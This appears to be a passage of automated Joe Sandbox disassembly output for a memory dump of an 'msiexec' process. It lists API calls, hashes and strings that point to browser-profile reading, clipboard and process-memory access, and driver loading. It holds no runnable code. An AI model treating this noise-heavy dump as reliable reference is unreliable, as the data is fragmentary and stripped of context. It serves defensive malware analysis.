                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                    • API String ID: 2780580303-317687271
                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                    APIs
                                                    • EmptyClipboard.USER32 ref: 00409882
                                                    • wcslen.MSVCRT ref: 0040988F
                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                    • CloseClipboard.USER32 ref: 004098D7
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                    • String ID:
                                                    • API String ID: 1213725291-0
                                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                    • free.MSVCRT ref: 00418370
                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                    • String ID: OsError 0x%x (%u)
                                                    • API String ID: 2360000266-2664311388
                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                    APIs
                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                    • OpenClipboard.USER32(?), ref: 00411878
                                                    • GetLastError.KERNEL32 ref: 0041188D
                                                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                      • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                      • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                    • String ID:
                                                    • API String ID: 2628231878-0
                                                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                    • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ??2@??3@memcpymemset
                                                    • String ID:
                                                    • API String ID: 1865533344-0
                                                    • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                    • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID:
                                                    • API String ID: 1889659487-0
                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                    APIs
                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                    APIs
                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                    • memset.MSVCRT ref: 0040265F
                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                    • API String ID: 577499730-1134094380
                                                    • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                    • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                    • String ID: :stringdata$ftp://$http://$https://
                                                    • API String ID: 2787044678-1921111777
                                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                    • GetDC.USER32 ref: 004140E3
                                                    • wcslen.MSVCRT ref: 00414123
                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                    • _snwprintf.MSVCRT ref: 00414244
                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                    • String ID: %s:$EDIT$STATIC
                                                    • API String ID: 2080319088-3046471546
                                                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                    APIs
                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                    • memset.MSVCRT ref: 00413292
                                                    • memset.MSVCRT ref: 004132B4
                                                    • memset.MSVCRT ref: 004132CD
                                                    • memset.MSVCRT ref: 004132E1
                                                    • memset.MSVCRT ref: 004132FB
                                                    • memset.MSVCRT ref: 00413310
                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                    • memset.MSVCRT ref: 004133C0
                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                    • wcscpy.MSVCRT ref: 0041341F
                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                    Strings
                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                    • {Unknown}, xrefs: 004132A6
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                    • API String ID: 4111938811-1819279800
                                                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                    APIs
                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                    • String ID:
                                                    • API String ID: 829165378-0
                                                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                    APIs
                                                    • memset.MSVCRT ref: 00404172
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    • wcscpy.MSVCRT ref: 004041D6
                                                    • wcscpy.MSVCRT ref: 004041E7
                                                    • memset.MSVCRT ref: 00404200
                                                    • memset.MSVCRT ref: 00404215
                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                    • wcscpy.MSVCRT ref: 00404242
                                                    • memset.MSVCRT ref: 0040426E
                                                    • memset.MSVCRT ref: 004042CD
                                                    • memset.MSVCRT ref: 004042E2
                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                    • wcscpy.MSVCRT ref: 00404311
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                    • API String ID: 2454223109-1580313836
                                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                    APIs
                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                    • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                    • API String ID: 4054529287-3175352466
                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                    • API String ID: 3143752011-1996832678
                                                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                    • API String ID: 667068680-2887671607
                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                    • API String ID: 1607361635-601624466
                                                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
